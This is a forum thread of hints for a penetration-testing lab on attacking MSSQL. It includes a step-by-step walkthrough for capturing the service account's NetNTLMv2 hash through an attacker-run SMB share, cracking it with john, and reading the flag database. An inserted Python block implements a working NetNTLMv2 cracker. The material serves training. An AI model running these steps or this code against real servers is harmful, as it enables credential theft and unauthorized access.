Attacking Common Services - Attacking SQL Databases

hey y’all,

Need some help with the first question in the Attacking SQL database.
I have no clue how to get the mssql password. I have looked at all the DBs and I do not have access to the flagDB or hmaildb. I have no clue how to move forward in this section. Any help would be appreciated.

Try one of the approaches mentioned in the text in that chapter. It has to do with undocumented stored procedures. Try those and I’m sure you’ll figure it out.

Hey man, thanks for that. Let me try that. I had to take a quick break.

I have the service account password but it doesn’t seem to allow login. They can’t be impersonated either. I’m lost as to what to do here.



Try sqsh (doesn’t work on pwnbox, so VPN in from your own Linux machine); that did the trick for me. I always hate it when you get sidetracked with unclear ‘execution’ things, but if you have the right password it should work.

Bro, I am lost haha… I think I am overlooking something here. Would y’all be able to give me another nugget? I have tried looking through the DB; however, I am unable to find the users table. I have found

  • 1> SELECT * FROM syslogins
  • 2> go
    and
  • SELECT name, password FROM master..syslogins
  • go

however, I am unable to find much of use. I have tried enumerating the other ports, and I might be missing something across the ports.

I will be looking into RDP. Hopefully I find something?

I tried logging in with sqsh using the right credentials for mssqlsvc but it’s not working.

Hello, I’m the same as you… Looking through forums and searching, totally stuck at the moment…

Yeah, it’s not as intuitive, but there is a GUI option. You just right-click on what you want and there should be an option.

Thanks!! I got it :)

gui option for what?

For anyone still working on this, here are notes and hints (uncover as you progress).

NOTE:

  • I managed to log in with the htbdbuser only with the sqlcmd tool

HINT:

  • $ sqlcmd -S <IP> -U htbdbuser followed by the passwd.
  • as @ST_oma mentioned, look into undocumented stored procedures for mssqlsvc password

NOTE:

  • If you have the password for mssqlsvc – I had to connect remotely over the VPN because sqsh is not working properly on the pwnbox. So establish the VPN and try it from your PC.

HINT:

  • Notice that the password obtained is not a local database password but an NTLM password, meaning this password is for the user that’s on the OS, NOT directly on the database.
  • You can force the sqsh to use Windows Authentication, just look closely into the module text.

GL!


Check impacket mssqlclient, esp the command help once you’re connected. It has some nice added functionalities / shortcuts for most of the techniques taught in this chapter (easy activation of xp_cmdshell, enumeration of users that you can impersonate, links, etc.).

Great tool.


Read this if you are using Impacket’s mssqlclient and can’t login as the mssqlsvc user and are getting the error “Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.”

DO NOT put the .\ or WIN-02\ in front of the username, leave it as user@host, but you DO need another option for Windows auth, check the help menu for that


Guys, when you connect to the mssql CLI there’s one option to authenticate ;)

Hello, I tried all approaches and can’t find the hash. Any hint please? Thanks.

Follow these steps:

  1. sqlcmd -S Target_Ip -U julio -P
  2. note the table names
  3. start
    sudo impacket-smbserver share ./ -smb2support
  4. try any step from the “Capture MSSQL Service Hash” section
  5. Note: don’t forget to enter the IP of the attack box in step 4
  6. copy the hash to a text file and crack it (note: start copying from "mss… to …000)
  7. crack it using john: john <your hash file> (leave the wordlist at the default)
  8. now log in with the creds you found using mssqlclient.py -p 1433 user_which_you_found@target_ip -windows-auth
  9. select name from master.dbo.sysdatabases
  10. use flagdb
  11. SELECT * FROM flagdb.INFORMATION_SCHEMA.TABLES
  12. select * from tb_flag
    That’s it.
    Thank you for reading this, I hope it helped.
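What steps 6 and 7 of the post above actually do, as an added example (this is not code from the post, from HTB, or from impacket). impacket-smbserver prints the NetNTLMv2 it captured when xp_dirtree reached the share as one line of the form `user::domain:serverchallenge:NTProofStr:blob`; that is the "mss… to …000" span the poster tells you to copy. The block below pulls that line out of smbserver-style output, checks its shape, and cracks it the way john's netntlmv2 format and hashcat mode 5600 do: NT hash = MD4(UTF-16LE(password)), NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), NTProofStr = HMAC-MD5(NTLMv2 key, serverchallenge || blob). The server output, blob contents, challenge value, password and wordlist are all constructed for this example; only the user mssqlsvc and the host WIN-02 come from the thread.

```python
"""Added example: extract a NetNTLMv2 line from smbserver output and crack it offline."""
import hashlib
import hmac
import re
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    # pad to 56 mod 64, then append the bit length little-endian
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: ABCD -> DABC -> CDAB -> BCDA
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntproofstr(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> bytes:
    """NetNTLMv2 proof: HMAC-MD5 over server challenge || blob, keyed by the NTLMv2 key."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, challenge + blob, hashlib.md5).digest()


# user::domain:16-hex server challenge:32-hex NTProofStr:hex blob
HASH_RE = re.compile(r"^(?P<user>[^:\s]+)::(?P<domain>[^:\s]+):(?P<chal>[0-9a-f]{16}):"
                     r"(?P<proof>[0-9a-f]{32}):(?P<blob>[0-9a-f]+)$", re.IGNORECASE)


def extract_hashes(server_output: str) -> list:
    """Return the john/hashcat-ready NetNTLMv2 lines found in smbserver-style output."""
    found = []
    for line in server_output.splitlines():
        line = line.strip().removeprefix("[*] ")
        m = HASH_RE.match(line)
        # an NTLMv2 blob starts with the 0x0101 response version and ends in four zero bytes
        if m and m["blob"].startswith("0101000000000000") and m["blob"].endswith("00000000"):
            found.append(line)
    return found


def crack(hash_line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches, or None."""
    m = HASH_RE.match(hash_line)
    if not m:
        raise ValueError("not a NetNTLMv2 line")
    chal, blob, want = bytes.fromhex(m["chal"]), bytes.fromhex(m["blob"]), bytes.fromhex(m["proof"])
    for candidate in wordlist:
        if hmac.compare_digest(ntproofstr(m["user"], m["domain"], candidate, chal, blob), want):
            return candidate
    return None


# --- constructed sample standing in for what smbserver prints once xp_dirtree fires ---
CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")                 # constructed 8-byte server challenge
BLOB = (bytes.fromhex("0101000000000000") + bytes(8)           # response version, reserved, timestamp
        + bytes.fromhex("0011223344556677") + bytes(4)        # client challenge, reserved
        + b"\x02\x00\x0c\x00" + "WIN-02".encode("utf-16le")   # AV_PAIR: NetBIOS domain name
        + bytes(4) + bytes(4))                                 # MsvAvEOL, trailing zeros
SAMPLE_PASSWORD = "Winter2024!"                                # constructed; not the lab password
SAMPLE_OUTPUT = (
    "[*] Incoming connection (10.10.10.5,49676)\n"
    "[*] AUTHENTICATE_MESSAGE (WIN-02\\mssqlsvc,WIN-02)\n"
    "[*] User WIN-02\\mssqlsvc authenticated successfully\n"
    "[*] mssqlsvc::WIN-02:%s:%s:%s\n"
    % (CHALLENGE.hex(), ntproofstr("mssqlsvc", "WIN-02", SAMPLE_PASSWORD, CHALLENGE, BLOB).hex(), BLOB.hex())
)
WORDLIST = ["password", "mssqlsvc", "Summer2023!", "Winter2024!", "P@ssw0rd"]  # constructed wordlist

if __name__ == "__main__":
    for h in extract_hashes(SAMPLE_OUTPUT):
        print("captured:", h)
        print("cracked :", crack(h, WORDLIST))
```

The same recomputation is what makes the post's hint about the domain prefix matter: the user name is upper-cased but the domain string is hashed as captured, so a line you edit by hand (adding `WIN-02\`, changing case) will never crack. Write the extracted line to a file unchanged and hand that file to john or hashcat.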

You couldn’t have given better suggestions.